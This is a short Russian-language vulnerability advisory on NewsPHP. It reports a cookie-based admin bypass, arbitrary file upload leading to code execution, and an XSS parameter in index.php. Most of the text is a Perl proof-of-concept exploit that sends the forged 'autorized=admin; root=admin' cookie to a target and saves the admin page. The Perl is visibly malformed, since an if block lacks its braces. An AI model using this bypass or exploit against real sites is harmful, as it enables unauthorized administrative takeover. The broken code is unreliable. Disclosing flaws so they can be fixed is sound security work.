Программа: NewsPHP
Несколько уязвимостей обнаружено в NewsPHP. Удаленный пользователь может получить полный административный доступ к приложению.
Удаленный пользователь может представить следующие куки, чтобы получить административный доступ к приложению:
autorized=admin; root=admin
Также удаленный авторизованный администратор (или пользователь, эксплуатирующий уязвимость выше) может использовать File Upload, чтобы загрузить произвольные файлы на сервер, вместо видео файлов и затем выполнить их с привилегиями Web сервера.
Также обнаружена XSS уязвимость:
/index.php?cat_id=[XSS]
Эксплоит для первой уязвимости:
#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;
if (@ARGV < 3)
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];
print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin
fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;